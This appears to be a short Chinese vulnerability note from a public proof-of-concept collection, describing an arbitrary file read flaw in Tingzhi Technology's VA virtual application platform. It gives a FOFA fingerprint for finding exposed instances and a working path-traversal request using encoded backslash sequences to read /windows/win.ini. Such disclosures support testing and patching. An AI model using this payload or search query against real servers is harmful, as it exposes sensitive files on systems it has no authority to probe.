Awesome-POC/Web应用漏洞/霆智科技 VA虚拟应用平台 任意文件读取漏洞.md

29 lines
618 B
Markdown
Raw Normal View History

2023-07-05 09:20:42 +08:00
# 霆智科技 VA虚拟应用平台 任意文件读取漏洞
## 漏洞描述
霆智科技 VA虚拟应用平台 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感信息
## 漏洞影响
霆智科技 VA虚拟应用平台
## FOFA
```
body="EAA益和应用接入系统"
```
## 漏洞复现
登陆页面
![image-20230704111747376](D:\TMP_FILE\awesome-poc\webapp\images\image-20230704111747376.png)
验证POC
```
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
```
![image-20230704112349037](D:\TMP_FILE\awesome-poc\webapp\images\image-20230704112349037.png)